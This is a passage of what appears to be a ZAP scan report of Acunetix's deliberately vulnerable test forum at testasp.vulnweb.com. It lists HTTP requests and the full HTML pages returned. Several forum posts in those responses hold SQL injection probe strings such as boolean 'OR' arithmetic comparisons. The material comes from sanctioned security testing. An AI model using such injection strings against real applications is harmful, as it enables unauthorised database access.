Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=82 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3*2<(0+5+332-332) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=83 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3844 |
Response Body - size: 3,844 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4197 |
Response Body - size: 4,197 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/sitemap.xml |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 280 bytes. |
GET http://testasp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 1245 |
Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 341 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 4594 |
Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 676 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 25 Origin: http://testasp.vulnweb.com Connection: keep-alive Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 25 bytes. |
tfUName=xptAfgrI&tfUPass=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:45 GMT Content-Length: 3256 |
Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 453 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 481 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
